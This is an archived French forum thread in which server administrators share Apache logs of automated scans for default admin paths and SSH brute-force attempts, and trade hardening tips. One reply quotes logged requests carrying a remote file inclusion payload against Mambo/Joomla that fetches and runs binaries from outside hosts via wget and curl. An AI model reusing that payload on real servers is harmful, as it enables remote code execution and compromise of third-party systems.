Jump to content

comment ce fais-ce que je me fasse scanner ?


Recommended Posts

au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ...

des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs :francais:

piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ?

piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!!

==> les gens, si possible, utiliser un chemin différents, c'est plus mieux ^^

c'était ma pitite pierre aportée à la communauté :)

[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/a1b2c3d4e5f6g7h8i9
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] script '/var/www/adxmlrpc.php' not found or unable to stat
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/adserver
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpAdsNew
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpadsnew
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpads
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/Ads
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/ads
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] script '/var/www/xmlrpc.php' not found or unable to stat
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlrpc
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlsrv
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/drupal
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/community
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogtest
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2evo
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/wordpress
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpgroupware
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/PMA
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/db
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/dbadmin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/web
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpmyadmin2
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysqladmin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql-admin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] script '/var/www/main.php' not found or unable to stat
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.6
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.4
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.1
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.3
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.6
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/myadmin
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0-pl1
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-pl1
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-rc1
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.2-rc1
[Thu Jun 08 04:39:12 2006] [error] [client 80.96.96.121] File does not exist: /var/www/README
[Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde
[Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde2
[Thu Jun 08 04:39:14 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde3
[Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde-3.0.9
[Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/Horde

Link to comment
Share on other sites

nananan, une bonne vieille ip fixe et un DNS tout ce qu'il y a de plus classique, mes routeurs n'autorise que le port 80 et 443, donc, la personne scan bien les adresse (ou ip, ce qui est le plus probable) pour trouver des sites qu'il pourra véroler :craint:;)

Link to comment
Share on other sites

au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ...

des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs :craint:

piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ?

piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!!

Cacher un serveur (au ping notamment, mais aussi en ne mettant aucun DNS, etc...) n'a jamais changé quoi que ce soit pour ce qui est de la protection.

Vu l'activité sur internet, il y aura toujours quelque chose (virus, vers, hacker, etc...) qui découvrira le serveur quelles que soient les condition...

Mettre d'autres ports que les ports par défaut peut aider, mais c'est pareil un jour ou l'autre ça se trouvera.

Une vraie politique de sécurité est donc importante.

Link to comment
Share on other sites

au cours de mon analyse rituelle de fichier log, je me suis retrouvé devant une petite surprise ...

des PC distant s'amusent à scanner le contenu de mon serveur web qui ne tourne que depuis 5 jours, qui bloque les pings et qui est placé derrières 2 routeurs :craint:

piti 1, comment la personne m'a trouvée, s'amuse t'elle a scanner toutes les plages d'adresse ip ?

piti 2, ca craint quand même d'utiliser les répertoires par défaut des logiciel d'amin !!!

==> les gens, si possible, utiliser un chemin différents, c'est plus mieux ^^

c'était ma pitite pierre aportée à la communauté :)

[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/a1b2c3d4e5f6g7h8i9
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] script '/var/www/adxmlrpc.php' not found or unable to stat
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/adserver
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpAdsNew
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpadsnew
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpads
[Wed Jun 07 19:14:33 2006] [error] [client 83.138.146.85] File does not exist: /var/www/Ads
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/ads
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] script '/var/www/xmlrpc.php' not found or unable to stat
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlrpc
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/xmlsrv
[Wed Jun 07 19:14:34 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/drupal
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/community
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogs
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blog
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/blogtest
[Wed Jun 07 19:14:35 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/b2evo
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/wordpress
[Wed Jun 07 19:14:36 2006] [error] [client 83.138.146.85] File does not exist: /var/www/phpgroupware
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/PMA
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:44 2006] [error] [client 84.176.48.247] File does not exist: /var/www/db
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/dbadmin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/web
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:45 2006] [error] [client 84.176.48.247] File does not exist: /var/www/admin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpmyadmin2
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysqladmin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/mysql-admin
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] script '/var/www/main.php' not found or unable to stat
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.6
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.4
[Wed Jun 07 19:45:46 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.5.1
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.3
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.2.6
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/myadmin
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.0-pl1
[Wed Jun 07 19:45:47 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-pl1
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.3-rc1
[Wed Jun 07 19:45:48 2006] [error] [client 84.176.48.247] File does not exist: /var/www/phpMyAdmin-2.6.2-rc1
[Thu Jun 08 04:39:12 2006] [error] [client 80.96.96.121] File does not exist: /var/www/README
[Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde
[Thu Jun 08 04:39:13 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde2
[Thu Jun 08 04:39:14 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde3
[Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/horde-3.0.9
[Thu Jun 08 04:39:15 2006] [error] [client 80.96.96.121] File does not exist: /var/www/Horde

j'avais deja des attaques de ce genre, mais dernierement ca vise plus singulierement xmlrpc

130.227.55.243 - - [02/Jun/2006:05:50:20 +0200] "POST /xmlrpc.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:21 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:22 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:23 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:24 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:26 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:27 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:28 +0200] "POST /xmlrpc.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:29 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:30 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:31 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:32 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [02/Jun/2006:05:50:33 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Link to comment
Share on other sites

et si ça te gonfle :

www.ripe.net

tu tape/ cut'n'paste "83.138.146.85" dans la zone recherche

.../...

inetnum: 83.138.128.0 - 83.138.191.255

netname: UK-RACKSPACE-20040816

descr: PROVIDER Local Registry

descr: Rackspace.com

country: GB

org: ORG-RA33-RIPE

admin-c: DB1452-RIPE

tech-c: DB1452-RIPE

tech-c: RMHC1-RIPE

status: ALLOCATED PA "status:" definitions

mnt-by: RIPE-NCC-HM-MNT

mnt-lower: RSPC-MNT

mnt-routes: RSPC-MNT

mnt-domains: RSPC-MNT

source: RIPE # Filtered

.../...

remarks: ### Rackspace Abuse Department

remarks: ### Please send any complaints to the following:

remarks: ### abuse@rackspace.com

.../...

Link to comment
Share on other sites

C'est la même chose pour moi. J'ai plusieurs site avec des adresses IP fixe (et dans certains cas de "nouvelles" adresses qui n'on jamais eu de serveur Linux installé).

J'ai installé un serveur de test dernièrement... pas même 2 jours après l'installation tu aurais du voir le nombre de requêtes pour une connexion SSH, SMTP et HTTP !!!

Y'a vraiment des gars qui se font payer pour scanner l'Internet ! D'après toi comment font les gars qui font du SPAM ou un serveur IRC ou encore Kazaa (via Squid-cache), ils se trouvent une belle porte ouverte... et Hop !

C'est pratiquement inpensable d'installer un poste directement sur Internet (ou derrière un router comme toi avec les ports ouverts pour tes services) sans croire que personne n'essaiera pas d'y accéder !

Un jour, en analysant mes rapports Log de Apache, je suis tombé sur une adresse provenant du "Christmas Island" !!!! Pas croyable non... Ce pays un une petite île en Asie d'environ 10 000 habitants... ben y'a au moins un gars de là qui à trouvé mon site et s'est essayé.

Aujourd'hui, avant même de brancher ton câble réseau après une installation, faut penser à 2 fois si tout a été sécurisé.

Link to comment
Share on other sites

C'est exactement ça, comme Poulpatine a fait... mais certains font ce genre de scanne... et ils vont plus loin s'ils trouvent une faille de sécurité.

Si la porte est ouverte ils peuvent (tout dépendant de la faille):

envoyer virus

abuser de la connexion

accéder aux données, donc en détruire

...

Et dire qu'il n'existe pas de faille dans Linux c'est faux... car toutes les failles sont "humaines". Si tu configures mal un logiciel tu peux ouvrir la porte en même temps.

Ça m'a déjà arrivé d'être pris avec un "rootkit" dans le passé. J'avoue que par contre les nouvelles distributions sont de plus en plus sécuritaire du fait que par défaut ils activent des règles de "non-permission".

Link to comment
Share on other sites

Et puis croyez pas que c'est UN gars qui s'est dit "tiens je vais attaquer celui-là en France", c'est des pc zombies win32 qui scannent des plages d'IP...

ou des *nix très mal administrés (disons plutôt pas du tout administrés) :

j'avais des scans ssh avec des trucs du genre login: root pswd: root, login: admin, login: steve... (plusieurs dizaines voire quelques centaines d'essais).

J'ai fait quelques recherches sur les machines d'origine de ces scans, et j'ai trouvé par exemple des machines *nix appartenant à des gouvernements ! Je suppose qu'elles avaient un mot de passe trivial.

Depuis j'ai mis ssh sur un port haut, au moins ça soulage les logs.

Link to comment
Share on other sites

j'avais des scans ssh avec des trucs du genre login: root pswd: root, login: admin, login: steve... (plusieurs dizaines voire quelques centaines d'essais).

J'ai fait quelques recherches sur les machines d'origine de ces scans, et j'ai trouvé par exemple des machines *nix appartenant à des gouvernements ! Je suppose qu'elles avaient un mot de passe trivial.

Depuis j'ai mis ssh sur un port haut, au moins ça soulage les logs.

J'ai les mêmes... C'est pas bête, je vais changer le port de ssh, parce que ça pourrit sérieusement mes logs.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...